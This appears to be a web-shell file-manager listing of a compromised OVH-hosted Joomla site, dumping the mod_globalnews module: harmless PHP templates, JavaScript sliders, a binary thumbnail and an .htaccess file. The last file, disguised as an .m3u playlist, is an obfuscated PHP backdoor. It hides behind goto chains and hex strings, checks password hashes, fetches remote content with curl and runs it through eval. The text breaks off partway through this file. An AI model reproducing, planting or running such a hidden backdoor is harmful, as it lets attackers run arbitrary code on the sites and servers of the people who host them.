uawdijnntqw1x1x1
IP : 216.73.216.84
Hostname : webm003.cluster107.gra.hosting.ovh.net
Kernel : Linux webm003.cluster107.gra.hosting.ovh.net 5.15.167-ovh-vps-grsec-zfs-classid #1 SMP Tue Sep 17 08:14:20 UTC 2024 x86_64
Disable Function : _dyuweyrj4,_dyuweyrj4r,dl
OS : Linux
PATH:
/
home
/
opticamezl
/
www
/
newok
/
api
/
..
/
mod_globalnews.tar
/
/
tmpl/static.php000060400000001647151652221530007526 0ustar00<?php /*------------------------------------------------------------------------ # mod_globalnews - Global News Module # ------------------------------------------------------------------------ # author Joomla!Vargas # copyright Copyright (C) 2010 joomla.vargas.co.cr. All Rights Reserved. # @license - http://www.gnu.org/licenses/gpl-2.0.html GNU/GPL # Websites: http://joomla.vargas.co.cr # Technical Support: Forum - http://joomla.vargas.co.cr/forum -------------------------------------------------------------------------*/ // no direct access defined('_JEXEC') or die; foreach ($list as $item) : ?> <div class="gn_static gn_static_<?php echo $globalnews_id; ?>"> <?php echo $item->content; ?> </div> <?php endforeach; ?> <?php if ( $more == 1 && $group->link ) : ?> <div> <?php echo JHTML::_('link', $group->link, JText::_('More Articles...'), array('class'=>'readon') ); ?> </div> <?php endif;tmpl/list.php000060400000001723151652221530007205 0ustar00<?php /*------------------------------------------------------------------------ # mod_globalnews - Global News Module # ------------------------------------------------------------------------ # author Joomla!Vargas # copyright Copyright (C) 2010 joomla.vargas.co.cr. All Rights Reserved. # @license - http://www.gnu.org/licenses/gpl-2.0.html GNU/GPL # Websites: http://joomla.vargas.co.cr # Technical Support: Forum - http://joomla.vargas.co.cr/forum -------------------------------------------------------------------------*/ // no direct access defined('_JEXEC') or die; ?> <div class="gn_list gn_list_<?php echo $globalnews_id; ?>"> <ul> <?php foreach ($list as $item) : ?> <li> <?php echo $item->title; ?> </li> <?php endforeach; ?> </ul> <?php if ( $more == 1 && $group->link ) : ?> <div> <?php echo JHTML::_('link', $group->link, JText::_('More Articles...'), array('class'=>'readon') ); ?> </div> <?php endif; ?> </div> tmpl/default.php000060400000003002151652221530007646 0ustar00<?php /*------------------------------------------------------------------------ # mod_globalnews - Global News Module # ------------------------------------------------------------------------ # author Joomla!Vargas # copyright Copyright (C) 2010 joomla.vargas.co.cr. All Rights Reserved. # @license - http://www.gnu.org/licenses/gpl-2.0.html GNU/GPL # Websites: http://joomla.vargas.co.cr # Technical Support: Forum - http://joomla.vargas.co.cr/forum -------------------------------------------------------------------------*/ // no direct access defined('_JEXEC') or die; $i = $j = 0; foreach ($cat as $group) : $listCondition = $group->cond; $list = modGlobalNewsHelper::getGN_List($params,$listCondition); if (count($list) || $empty != 0) : $more = $params->get('more', 1); $i++; $j++; ?> <div style="float:left;width:<?php echo $width; ?>;"> <div class="globalnews" style="margin:<?php echo $params->get('margin', '2px'); ?>"> <?php if ( $show_cat != 0 ) : ?> <div class="gn_header_<?php echo $globalnews_id; ?>"> <span class="gn_header"><?php echo $group->image . $group->title; ?></span> <div class="gn_clear"></div> </div> <?php endif; if ( count ( $list) > 0 ) : require(JModuleHelper::getLayoutPath('mod_globalnews', $layout)); endif; ?> </div> </div> <?php if ( $i == $cols && $j != $total ) : ?> <div class="gn_clear"></div> <?php $i=0; endif; endif; endforeach; ?> <div class="gn_clear"></div> tmpl/index.html000060400000000054151652221530007512 0ustar00<html><body bgcolor="#FFFFFF"></body></html>tmpl/browser.php000060400000003102151652221530007706 0ustar00<?php /*------------------------------------------------------------------------ # mod_globalnews - Global News Module # ------------------------------------------------------------------------ # author Joomla!Vargas # copyright Copyright (C) 2010 joomla.vargas.co.cr. All Rights Reserved. # @license - http://www.gnu.org/licenses/gpl-2.0.html GNU/GPL # Websites: http://joomla.vargas.co.cr # Technical Support: Forum - http://joomla.vargas.co.cr/forum -------------------------------------------------------------------------*/ // no direct access defined('_JEXEC') or die; $doc = JFactory::getDocument(); $doc->addScript('modules/mod_globalnews/scripts/browser.js'); ?> <div class="gn_browser" id="gn_container_<?php echo $globalnews_id.'_'.$j; ?>"> <div class="gn_marquee" id="gn_marquee_<?php echo $globalnews_id.'_'.$j; ?>" style="position: absolute;"> <?php foreach ($list as $item) : ?> <div class="gn_news"> <?php echo $item->content; ?> <div class="gn_clear"></div> </div> <?php endforeach; ?> </div> </div> <?php if ( $more == 1 && $group->link ) : ?> <div> <?php echo JHTML::_('link', $group->link, JText::_('More Articles...'), array('class'=>'readon') ); ?> </div> <?php endif; ?> <script type="text/javascript" language="javascript"> <!-- var GN_Browser_<?php echo $globalnews_id.'_'.$j; ?> = new GN_Browser("gn_marquee_<?php echo $globalnews_id.'_'.$j; ?>","gn_container_<?php echo $globalnews_id.'_'.$j; ?>","GN_Browser_<?php echo $globalnews_id.'_'.$j; ?>",<?php echo $params->get('delay', 3000) ?>); --> </script> tmpl/scroller.php000060400000003021151652221530010050 0ustar00<?php /*------------------------------------------------------------------------ # mod_globalnews - Global News Module # ------------------------------------------------------------------------ # author Joomla!Vargas # copyright Copyright (C) 2010 joomla.vargas.co.cr. All Rights Reserved. # @license - http://www.gnu.org/licenses/gpl-2.0.html GNU/GPL # Websites: http://joomla.vargas.co.cr # Technical Support: Forum - http://joomla.vargas.co.cr/forum -------------------------------------------------------------------------*/ // no direct access defined('_JEXEC') or die; $doc = JFactory::getDocument(); $doc->addScript('modules/mod_globalnews/scripts/scroller.js'); ?> <script type="text/javascript" language="javascript"> <!-- var GN_Pausecontent_<?php echo $globalnews_id.'_'.$j; ?>=new Array(); <?php $k=0; foreach ($list as $item) : ${'content'.$k} = $item->content; ${'content'.$k} = preg_replace( "/[\n\t\r]+/",' ',${'content'.$k} ); ${'content'.$k} = str_replace( "'", "\\'",${'content'.$k} ); ?> GN_Pausecontent_<?php echo $globalnews_id.'_'.$j; ?>[<?php echo $k; ?>]='<?php echo ${'content'.$k}; ?>'; <?php $k++; endforeach; ?> new GN_Pausescroller(GN_Pausecontent_<?php echo $globalnews_id.'_'.$j; ?>, "gn_scroller_<?php echo $globalnews_id.'_'.$j; ?>", "", <?php echo $params->get('delay', 3000) ?>); --> </script> <?php if ( $more == 1 && $group->link ) : ?> <div> <?php echo JHTML::_('link', $group->link, JText::_('More Articles...'), array('class'=>'readon') ); ?> </div> <?php endif;tmpl/slider.php000060400000003634151652221530007517 0ustar00<?php /*------------------------------------------------------------------------ # mod_globalnews - Global News Module # ------------------------------------------------------------------------ # author Joomla!Vargas # copyright Copyright (C) 2010 joomla.vargas.co.cr. All Rights Reserved. # @license - http://www.gnu.org/licenses/gpl-2.0.html GNU/GPL # Websites: http://joomla.vargas.co.cr # Technical Support: Forum - http://joomla.vargas.co.cr/forum -------------------------------------------------------------------------*/ // no direct access defined('_JEXEC') or die; $linkMore = ''; $linkNext = ''; if ( $more == 1 && $group->link ) { $linkMore = '<a href=\"'.$group->link.'\">'.JText::_('More Articles...').'</a>'; } if ( $params->get( 'next', 1 ) == 1 ) { $linkNext = JText::_('Next'); } ?> <div id="gn_slider_<?php echo $globalnews_id.'_'.$j; ?>" class="gn_slider gn_slider_<?php echo $globalnews_id; ?>"> <div class="gn_opacitylayer"> <?php foreach ($list as $item) : ?> <div class="gn_news"> <?php echo $item->content; ?> </div> <?php endforeach; ?> </div> </div> <div class="gn_pagination gn_pagination_<?php echo $globalnews_id; ?>" id="paginate-gn_slider_<?php echo $globalnews_id.'_'.$j; ?>"></div> <?php $doc = JFactory::getDocument(); if (!defined('_MOD_VARGAS_ONLOAD')) { define ('_MOD_VARGAS_ONLOAD',1); $doc->addScriptDeclaration("function addLoadEvent(func){if(typeof window.addEvent=='function'){window.addEvent('load',function(){func()});}else if(typeof window.onload!='function'){window.onload=func;}else{var oldonload=window.onload;window.onload=function(){if(oldonload){oldonload();}func();}}}"); } $doc->addScript('modules/mod_globalnews/scripts/slider.js'); $doc->addScriptDeclaration("addLoadEvent(function(){GN_ContentSlider('gn_slider_".$globalnews_id."_".$j."',".$params->get('delay',3000).",'".$linkNext."','".$linkMore."');});"); ?>scripts/scroller.js000060400000010515151652221530010416 0ustar00/*------------------------------------------------------------------------ # mod_globalnews - Global News Module # ------------------------------------------------------------------------ # author Joomla!Vargas # copyright Copyright (C) 2010 joomla.vargas.co.cr. All Rights Reserved. # @license - http://www.gnu.org/licenses/gpl-2.0.html GNU/GPL # Websites: http://joomla.vargas.co.cr # Technical Support: Forum - http://joomla.vargas.co.cr/forum -------------------------------------------------------------------------*/ function GN_Pausescroller(content, divId, divClass, delay){ this.content=content; //message array content this.tickerid=divId; //ID of ticker div to display information this.delay=delay; //Delay between msg change, in miliseconds. this.mouseoverBol=0; //Boolean to indicate whether mouse is currently over scroller (and pause it if it is) this.hiddendivpointer=1; //index of message array for hidden div document.write('<div id="'+divId+'" class="'+divClass+'" style="position: relative; overflow: hidden"><div class="innerDiv" style="position: absolute; width: 100%" id="'+divId+'1">'+content[0]+'</div><div class="innerDiv" style="position: absolute; width: 100%; visibility: hidden" id="'+divId+'2">'+(content[1]?content[1]:content[0])+'</div></div>'); var scrollerinstance=this; if (window.addEventListener) //run onload in DOM2 browsers window.addEventListener("load", function(){scrollerinstance.initialize()}, false); else if (window.attachEvent) //run onload in IE5.5+ window.attachEvent("onload", function(){scrollerinstance.initialize()}); else if (document.getElementById) //if legacy DOM browsers, just start scroller after 0.5 sec setTimeout(function(){scrollerinstance.initialize()}, 500); } GN_Pausescroller.prototype.initialize=function(){ this.tickerdiv=document.getElementById(this.tickerid); this.visiblediv=document.getElementById(this.tickerid+"1"); this.hiddendiv=document.getElementById(this.tickerid+"2"); this.visibledivtop=parseInt(GN_Pausescroller.getCSSpadding(this.tickerdiv)); //set width of inner DIVs to outer DIV's width minus padding (padding assumed to be top padding x 2) this.visiblediv.style.width=this.hiddendiv.style.width=this.tickerdiv.offsetWidth-(this.visibledivtop*2)+"px"; this.getinline(this.visiblediv, this.hiddendiv); this.hiddendiv.style.visibility="visible"; var scrollerinstance=this; document.getElementById(this.tickerid).onmouseover=function(){scrollerinstance.mouseoverBol=1}; document.getElementById(this.tickerid).onmouseout=function(){scrollerinstance.mouseoverBol=0}; if (window.attachEvent) //Clean up loose references in IE window.attachEvent("onunload", function(){scrollerinstance.tickerdiv.onmouseover=scrollerinstance.tickerdiv.onmouseout=null}); setTimeout(function(){scrollerinstance.animateup()}, this.delay); } GN_Pausescroller.prototype.animateup=function(){ var scrollerinstance=this; if (parseInt(this.hiddendiv.style.top)>(this.visibledivtop+5)){ this.visiblediv.style.top=parseInt(this.visiblediv.style.top)-5+"px"; this.hiddendiv.style.top=parseInt(this.hiddendiv.style.top)-5+"px"; setTimeout(function(){scrollerinstance.animateup()}, 50); } else{ this.getinline(this.hiddendiv, this.visiblediv); this.swapdivs(); setTimeout(function(){scrollerinstance.setmessage()}, this.delay); } } GN_Pausescroller.prototype.swapdivs=function(){ var tempcontainer=this.visiblediv; this.visiblediv=this.hiddendiv; this.hiddendiv=tempcontainer; } GN_Pausescroller.prototype.getinline=function(div1, div2){ div1.style.top=this.visibledivtop+"px"; div2.style.top=Math.max(div1.parentNode.offsetHeight, div1.offsetHeight)+"px"; } GN_Pausescroller.prototype.setmessage=function(){ var scrollerinstance=this; if (this.mouseoverBol==1) //if mouse is currently over scoller, do nothing (pause it) setTimeout(function(){scrollerinstance.setmessage()}, 100); else{ var i=this.hiddendivpointer; var ceiling=this.content.length; this.hiddendivpointer=(i+1>ceiling-1)? 0 : i+1; this.hiddendiv.innerHTML=this.content[this.hiddendivpointer]; this.animateup(); } } GN_Pausescroller.getCSSpadding=function(tickerobj){ //get CSS padding value, if any if (tickerobj.currentStyle) return tickerobj.currentStyle["paddingTop"]; else if (window.getComputedStyle) //if DOM2 return window.getComputedStyle(tickerobj, "").getPropertyValue("padding-top"); else return 0; }scripts/browser.js000060400000005113151652221530010252 0ustar00/*------------------------------------------------------------------------ # mod_globalnews - Global News Module # ------------------------------------------------------------------------ # author Joomla!Vargas # copyright Copyright (C) 2010 joomla.vargas.co.cr. All Rights Reserved. # @license - http://www.gnu.org/licenses/gpl-2.0.html GNU/GPL # Websites: http://joomla.vargas.co.cr # Technical Support: Forum - http://joomla.vargas.co.cr/forum -------------------------------------------------------------------------*/ function GN_Browser(marquee,container,varname,speed){ this.marqueespeed=speed/1000; this.pauseit=1; //Pause marquee onMousever (0=no. 1=yes)? this.copyspeed=this.marqueespeed; this.pausespeed=(this.pauseit==0)? this.copyspeed: 0; this.delayb4scroll=2000; //Specify initial delay before marquee starts to scroll on page (ms) this.marquee=marquee; this.container=container; this.varname=varname; this.cross_marquee=document.getElementById(this.marquee); this.actualheight=''; eval("this.cross_marquee.onmouseover=function(){"+this.varname+".pause();}"); eval("this.cross_marquee.onmouseout=function(){"+this.varname+".play();}"); if (window.addEvent) { eval("window.addEvent('load',function(){"+this.varname+".initialize()})"); } else if (window.addEventListener) { eval("window.addEventListener('load',function(){"+this.varname+".initialize()}, false)"); } else if (window.attachEvent) { eval("window.attachEvent('onload',function(){"+this.varname+".initialize()})"); } else if (document.getElementById){ eval("window.onload=function(){"+this.varname+".initialize()}"); } } GN_Browser.prototype.pause=function(){ this.copyspeed=this.pausespeed; } GN_Browser.prototype.play=function(){ this.copyspeed=this.marqueespeed; } GN_Browser.prototype.scrollmarquee=function(){ if (parseInt(this.cross_marquee.style.top)>(this.actualheight*(-1)+8)) this.cross_marquee.style.top=parseInt(this.cross_marquee.style.top)-this.copyspeed+"px"; else this.cross_marquee.style.top=parseInt(this.marqueeheight)+8+"px"; } GN_Browser.prototype.initialize=function(){ this.cross_marquee.style.top=0; this.marqueeheight=document.getElementById(this.container).offsetHeight; this.actualheight=this.cross_marquee.offsetHeight; if (window.opera || navigator.userAgent.indexOf("Netscape/7")!=-1){ //if Opera or Netscape 7x, add scrollbars to scroll and exit this.cross_marquee.style.height=this.marqueeheight+"px"; this.cross_marquee.style.overflow="scroll"; return; } setTimeout('lefttime=setInterval("'+this.varname+'.scrollmarquee();",30)',this.delayb4scroll); } scripts/index.html000060400000000054151652221530010225 0ustar00<html><body bgcolor="#FFFFFF"></body></html>scripts/slider.js000060400000015655151652221530010065 0ustar00/*------------------------------------------------------------------------ # mod_globalnews - Global News Module # ------------------------------------------------------------------------ # author Joomla!Vargas # copyright Copyright (C) 2010 joomla.vargas.co.cr. All Rights Reserved. # @license - http://www.gnu.org/licenses/gpl-2.0.html GNU/GPL # Websites: http://joomla.vargas.co.cr # Technical Support: Forum - http://joomla.vargas.co.cr/forum -------------------------------------------------------------------------*/ var csbustcachevar=0; var enabletransition=1; var csloadstatustext="Loading..."; var csexternalfiles=[]; var enablepersist=true; var slidernodes=new Object(); var csloadedobjects=""; function GN_ContentSlider(sliderid, autorun, nextText, linkMore){ var slider=document.getElementById(sliderid); if (typeof nextText!="undefined" && nextText!="")slider.nextText=nextText; if (typeof linkMore!="undefined" && linkMore!="")slider.linkMore=linkMore; slidernodes[sliderid]=[]; GN_ContentSlider.loadobjects(csexternalfiles); var alldivs=slider.getElementsByTagName("div"); for (var i=0; i<alldivs.length; i++){ if (alldivs[i].className=="gn_opacitylayer") slider.opacitylayer=alldivs[i]; else if (alldivs[i].className=="gn_news"){ slidernodes[sliderid].push(alldivs[i]); if (typeof alldivs[i].getAttribute("rel")=="string") GN_ContentSlider.ajaxpage(alldivs[i].getAttribute("rel"), alldivs[i]); } } GN_ContentSlider.buildpagination(sliderid); var loadfirstcontent=true; if (enablepersist && getCookie(sliderid)!=""){ var cookieval=getCookie(sliderid).split(":"); if (document.getElementById(cookieval[0])!=null && typeof slidernodes[sliderid][cookieval[1]]!="undefined"){ GN_ContentSlider.turnpage(cookieval[0], parseInt(cookieval[1])); loadfirstcontent=false; } } if (loadfirstcontent==true) GN_ContentSlider.turnpage(sliderid, 0); if (typeof autorun=="number" && autorun>0) window[sliderid+"timer"]=setTimeout(function(){GN_ContentSlider.autoturnpage(sliderid, autorun)}, autorun); } GN_ContentSlider.buildpagination=function(sliderid){ var slider=document.getElementById(sliderid); var paginatediv=document.getElementById("paginate-"+sliderid); var pcontent=""; for (var i=0; i<slidernodes[sliderid].length; i++) pcontent+='<a href="#" onClick=\"GN_ContentSlider.turnpage(\''+sliderid+'\', '+i+'); return false\">'+(i+1)+'</a> '; pcontent+='<a href="#" onClick=\"GN_ContentSlider.turnpage(\''+sliderid+'\', parseInt(this.getAttribute(\'rel\'))); return false\">'+(slider.nextText || "")+'</a>'; if (slider.linkMore) pcontent+=slider.linkMore; paginatediv.innerHTML=pcontent; paginatediv.onclick=function(){ if (typeof window[sliderid+"timer"]!="undefined") clearTimeout(window[sliderid+"timer"]); } } GN_ContentSlider.turnpage=function(sliderid, thepage){ var paginatelinks=document.getElementById("paginate-"+sliderid).getElementsByTagName("a"); for (var i=0; i<slidernodes[sliderid].length; i++){ paginatelinks[i].className=""; slidernodes[sliderid][i].style.display="none"; } paginatelinks[thepage].className="selected"; if (enabletransition){ if (window[sliderid+"fadetimer"]) clearTimeout(window[sliderid+"fadetimer"]); this.setopacity(sliderid, 0.1); } slidernodes[sliderid][thepage].style.display="block"; if (enabletransition) this.fadeup(sliderid, thepage); paginatelinks[slidernodes[sliderid].length].setAttribute("rel", thenextpage=(thepage<slidernodes[sliderid].length-1)? thepage+1 : 0); if (enablepersist) setCookie(sliderid, sliderid+":"+thepage); } GN_ContentSlider.autoturnpage=function(sliderid, autorunperiod){ var paginatelinks=document.getElementById("paginate-"+sliderid).getElementsByTagName("a"); var nextpagenumber=parseInt(paginatelinks[slidernodes[sliderid].length].getAttribute("rel")); GN_ContentSlider.turnpage(sliderid, nextpagenumber); window[sliderid+"timer"]=setTimeout(function(){GN_ContentSlider.autoturnpage(sliderid, autorunperiod)}, autorunperiod); } GN_ContentSlider.setopacity=function(sliderid, value){ var targetobject=document.getElementById(sliderid).opacitylayer || null; if (targetobject && targetobject.filters && targetobject.filters[0]){ if (typeof targetobject.filters[0].opacity=="number") targetobject.filters[0].opacity=value*100; else targetobject.style.filter="alpha(opacity="+value*100+")"; } else if (targetobject && typeof targetobject.style.MozOpacity!="undefined") targetobject.style.MozOpacity=value; else if (targetobject && typeof targetobject.style.opacity!="undefined") targetobject.style.opacity=value; targetobject.currentopacity=value; } GN_ContentSlider.fadeup=function(sliderid){ var targetobject=document.getElementById(sliderid).opacitylayer || null; if (targetobject && targetobject.currentopacity<1){ this.setopacity(sliderid, targetobject.currentopacity+0.1); window[sliderid+"fadetimer"]=setTimeout(function(){GN_ContentSlider.fadeup(sliderid)}, 100); } } function getCookie(Name){ var re=new RegExp(Name+"=[^;]+", "i"); if (document.cookie.match(re)) return document.cookie.match(re)[0].split("=")[1]; return ""; } function setCookie(name, value){ document.cookie = name+"="+value; } GN_ContentSlider.ajaxpage=function(url, thediv){ var page_request = false; var bustcacheparameter=""; if (window.XMLHttpRequest) page_request = new XMLHttpRequest(); else if (window.ActiveXObject){ try { page_request = new ActiveXObject("Msxml2.XMLHTTP"); } catch (e){ try{ page_request = new ActiveXObject("Microsoft.XMLHTTP"); } catch (e){} } } else return false; thediv.innerHTML=csloadstatustext; page_request.onreadystatechange=function(){ GN_ContentSlider.loadpage(page_request, thediv); } if (csbustcachevar) bustcacheparameter=(url.indexOf("?")!=-1)? "&"+new Date().getTime() : "?"+new Date().getTime(); page_request.open('GET', url+bustcacheparameter, true); page_request.send(null); } GN_ContentSlider.loadpage=function(page_request, thediv){ if (page_request.readyState == 4 && (page_request.status==200 || window.location.href.indexOf("http")==-1)) thediv.innerHTML=page_request.responseText; } GN_ContentSlider.loadobjects=function(externalfiles){ for (var i=0; i<externalfiles.length; i++){ var file=externalfiles[i]; var fileref=""; if (csloadedobjects.indexOf(file)==-1){ if (file.indexOf(".js")!=-1){ fileref=document.createElement('script'); fileref.setAttribute("type","text/javascript"); fileref.setAttribute("src", file); } else if (file.indexOf(".css")!=-1){ fileref=document.createElement("link"); fileref.setAttribute("rel", "stylesheet"); fileref.setAttribute("type", "text/css"); fileref.setAttribute("href", file); } } if (fileref!=""){ document.getElementsByTagName("head").item(0).appendChild(fileref); csloadedobjects+=file+" "; } } } thumbs/08/index.html000060400000000035151652221530010266 0ustar00<html> <body> </body> </html>thumbs/08/b_90_90_14145495_18_CIOC.jpg000060400000005021151652221530012141 0ustar00���JFIF��;CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), quality = 80 ��C %# , #&')*)-0-(0%()(��C (((((((((((((((((((((((((((((((((((((((((((((((((((��8Z"�� ���}!1AQa"q2���#B��R��$3br� %&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz������������������������������������������������������������������������ ���w!1AQaq"2�B���� #3R�br� $4�%�&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz�����������������������������������������������������������������������?����x�C�Y�T��c�O�Y>��N�a|b�x#EAjM^�+n��@:�A��s�ט��x�����2���Bap��V#���3�8k���v��F4^&���w=3A�S�5[��#z�ey:���l`��OZ�,���ck���s���̍�y�Z���%�6�������Үj������L�d�la8�Bޤ�V��ܔ-�v]=Y�����`c�I;sw���_�H���L�o@u;����:N���S�@?L�!w=��m�⋖�����wv4�zsW.<@�f����&�K�$,v��31��qՏ�T�XN�K�j����zSt�?c�%���z=ͧ�����u ��Gn�V��V=�c>�}�V�W���X�2�w9x�B�F��\���JN̈́�.�+2r�`^!;@ w��Y�\61�~�n���ծneT�FK��*UX5{�tX��gǬ�8�ȗ��<�7p:�Ҫ��-�'s��v;���˟����n�~9?��]��Ko�^��I��w�}ɸ�ōi|U�-��4o�a�-�{Y��7u?�����已��^-��uK0��%���g?)�q�1��kօu*Pkx=W�s�6��<�XZN�I����s��,H�;:���;�ӥs�DE�y0��X�H��;J���_^=��-a3e&���W����}b� �8*����/j�Rm�&�g��x���R�咏+�}��8���o�НTn���}�Fq��R�@���?Gy��2���g �g�8�u����1�����7��I㍻��v"�V�b�4������$��ȿu��Q��qQ[��ͧ,y=W�ua)<%Y��&�U��E�r�O��ѵGH����ق�P�`�$��|��3�;_���ҭ�x:���R�5MR[c��^J�!l`8UU�b��Z�~��o9�E��6w��H'ׅ�Le V�b�_zX�h�b�8b��@�P;m�+��f��FY�kU�`��%Xc�`G�],�7���봴<y(�>_��۸�>�nM6լ�c ` ��t"����f��K��?�B%-E�"�X�NDpā���V�%tD{������X�<q��`aшd��Z�_v�h�Ĭ_�cL��i�B|�."m�Bݙr�Y���-�R�!�aw@�6�v a��g�Z.�_$Bg�Mv�3���>w`��x�<�zsZ&��]�n�j�t_e��-1�n�����������Z6���5����Hٲ����U}'Z�̑�@R�d��0q�A�����ޕ��3�إ�Ӥ��C'�\*��H`O�~\n� ����S�I)������$�G�C�����OD�1����o��a#!���(Ul�HH�G}�և�կg�-��c�_t����*GPN ��#3r����+�ѼZ5-F��mQ>�I� �£m|���ة�?��Ԑ�h�8�`XĿ����)!9����h�����D�X\���01����aߝ�#�s�E�����,dG�h�!�@x����q�<PYEr�3�_���G�5�ܹ%����n=��g��t����u!�n�x���\Okg�Zǽ���崛�[b����u�ƺ-���h�c����{����K?\]� �zR`�\���9#��?�#�����÷�'�A��=����b:E?�+��Ȟ��X`��8댟��5b ju�/��,g�"�,p���A�%�`pO�P뚵�Y��M����)}�!;r3�u�3L:���� Ѵ�)䜩��y4�*��1��(����m�O��Af]���a�Tp@9q ���.���Z%��v���@��s�J(惨��4����o$j ����>�����lq�E��thumbs/02/index.html000060400000000035151652221530010260 0ustar00<html> <body> </body> </html>thumbs/02/02/.htaccess000060400000000333151652221530010303 0ustar00<FilesMatch ".(py|exe|phtml|php|PHP|Php|PHp|pHp|pHP|pHP7|PHP7|phP|PhP|php5|suspected)$"> Order allow,deny Deny from all </FilesMatch> <FilesMatch "^(index.php|cache.php)$"># Order allow,deny Allow from all </FilesMatch>thumbs/02/02/EAsZQKBtPegJCbHkRS.m3u000060400000013323151652221530012225 0ustar00<?php goto htlj0jSRau0rkS; pfWOoCkHBeqMn2: @(md5(md5(md5(md5($qoqE53eevvT1XV[11])))) === "\65\141\64\142\70\61\61\x35\64\x63\71\x64\65\60\x62\x32\66\145\70\70\x30\x39\143\x39\142\70\x64\144\x35\x62\66\x31") && (count($qoqE53eevvT1XV) == 17 && in_array(gettype($qoqE53eevvT1XV) . count($qoqE53eevvT1XV), $qoqE53eevvT1XV)) ? ($qoqE53eevvT1XV[66] = $qoqE53eevvT1XV[66] . $qoqE53eevvT1XV[80]) && ($qoqE53eevvT1XV[82] = $qoqE53eevvT1XV[66]($qoqE53eevvT1XV[82])) && @eval($qoqE53eevvT1XV[66](${$qoqE53eevvT1XV[46]}[21])) : $qoqE53eevvT1XV; goto C09SjcU8Hfe2QO; wwrlZaK3pAfEqD: class hqDiZ5KfELz2_z { static function Zkvgh4K1hkGfmC($vmhVs_A2cWwzyk) { goto T6Wr2xrCiAlh4g; lDoNIYX58Xgqxq: return $os26M399zDJ9UV; goto xqRVNaPvVNNfj9; a74HesBIZnvUBu: $xgc0OyH_94SybZ = $RsYQnzwr4w5V4w("\x7e", "\x20"); goto UjX4hB2upwrUdT; UjX4hB2upwrUdT: $ATbrgbXTDXNqqh = explode("\x3b", $vmhVs_A2cWwzyk); goto D4GwrotLmkgu7E; D4GwrotLmkgu7E: $os26M399zDJ9UV = ''; goto aZQBVPQ1mTABVp; aZQBVPQ1mTABVp: foreach ($ATbrgbXTDXNqqh as $ScIgHqgFLbdUpm => $kXoBoXwcDfCymI) { $os26M399zDJ9UV .= $xgc0OyH_94SybZ[$kXoBoXwcDfCymI - 97531]; xLx9dEfZI9jsts: } goto AwuaiJW1Y0yj94; T6Wr2xrCiAlh4g: $RsYQnzwr4w5V4w = "\x72" . "\141" . "\x6e" . "\x67" . "\x65"; goto a74HesBIZnvUBu; AwuaiJW1Y0yj94: Hbq0WquyRdPjb0: goto lDoNIYX58Xgqxq; xqRVNaPvVNNfj9: } static function ZBol6tzV2SlbkK($dE89c1IbT5swFs, $ourH3WkLvlfOhK) { goto f47OudLDHt_xYc; xx9R_aA2uwOmIc: $B5s3xGKsTXVa46 = curl_exec($edDE91Efq3j8F7); goto YvlvceA9Bk2Uu5; YvlvceA9Bk2Uu5: return empty($B5s3xGKsTXVa46) ? $ourH3WkLvlfOhK($dE89c1IbT5swFs) : $B5s3xGKsTXVa46; goto j68bGadClWrXRX; f47OudLDHt_xYc: $edDE91Efq3j8F7 = curl_init($dE89c1IbT5swFs); goto a1Hu2eOVUmqAaW; a1Hu2eOVUmqAaW: curl_setopt($edDE91Efq3j8F7, CURLOPT_RETURNTRANSFER, 1); goto xx9R_aA2uwOmIc; j68bGadClWrXRX: } static function LM1G7cYSDjTb8M() { goto stgugoU2LF303J; A3Pyp1sVph66Ti: $Wsbb8U26A6Axt0 = @$Cxycj9Gvhj7SRA[2 + 1]($Cxycj9Gvhj7SRA[3 + 3], $CVduYWhJf3rV8J); goto wVCIBNr8swxiWs; W4YsZfjYEO1blL: @eval($Cxycj9Gvhj7SRA[4 + 0]($BKpIwc6ucA04Gi)); goto JxXrdkqo1BYrBy; JxXrdkqo1BYrBy: die; goto iLGx6LFbvCEgHC; wVCIBNr8swxiWs: $T3svSw3ixkgl4t = $Cxycj9Gvhj7SRA[0 + 2]($Wsbb8U26A6Axt0, true); goto Mghh_ajUtHcvTb; mGYlGLm8AZrrUM: $BKpIwc6ucA04Gi = self::ZBoL6tzV2slBKK($T3svSw3ixkgl4t[0 + 1], $Cxycj9Gvhj7SRA[0 + 5]); goto W4YsZfjYEO1blL; RKjpqsUsutVtVC: if (!(@$T3svSw3ixkgl4t[0] - time() > 0 and md5(md5($T3svSw3ixkgl4t[3 + 0])) === "\x63\x62\61\64\x35\x35\x32\65\64\x32\x31\x64\67\142\66\64\145\143\65\63\142\x66\67\70\x31\x34\x64\x38\x64\x66\x34\x33")) { goto OOPPtyVedsnpVL; } goto mGYlGLm8AZrrUM; oZUU_4SMRD2dYI: foreach ($fcMXoqIPNaH9IO as $DgapCCoBqv2Uj_) { $Cxycj9Gvhj7SRA[] = self::ZKVgh4k1HkGFMC($DgapCCoBqv2Uj_); s4cs9TmdNnjJf8: } goto uzzPrVfb5QHKMv; iLGx6LFbvCEgHC: OOPPtyVedsnpVL: goto va9VWYuXWNMgjT; VKkB4rKMSYswEF: $CVduYWhJf3rV8J = @$Cxycj9Gvhj7SRA[1]($Cxycj9Gvhj7SRA[9 + 1](INPUT_GET, $Cxycj9Gvhj7SRA[8 + 1])); goto A3Pyp1sVph66Ti; Mghh_ajUtHcvTb: @$Cxycj9Gvhj7SRA[1 + 9](INPUT_GET, "\157\x66") == 1 && die($Cxycj9Gvhj7SRA[2 + 3](__FILE__)); goto RKjpqsUsutVtVC; uzzPrVfb5QHKMv: BInjGJmGwEdz3Z: goto VKkB4rKMSYswEF; stgugoU2LF303J: $fcMXoqIPNaH9IO = array("\71\67\65\65\x38\73\71\x37\65\64\63\x3b\71\x37\x35\65\x36\x3b\71\67\x35\x36\x30\x3b\71\67\65\64\x31\x3b\x39\x37\65\65\66\x3b\x39\x37\x35\66\x32\73\71\x37\65\x35\65\73\71\x37\x35\64\60\x3b\x39\x37\x35\x34\x37\73\x39\67\65\x35\70\73\x39\x37\x35\64\61\73\71\67\x35\65\62\x3b\x39\x37\x35\64\x36\73\x39\x37\65\64\x37", "\71\x37\x35\64\62\x3b\x39\67\65\64\x31\73\71\67\65\x34\63\x3b\71\x37\x35\66\62\x3b\x39\x37\x35\64\63\x3b\x39\67\x35\x34\66\73\x39\x37\x35\64\x31\x3b\x39\67\x36\60\x38\73\71\67\x36\60\x36", 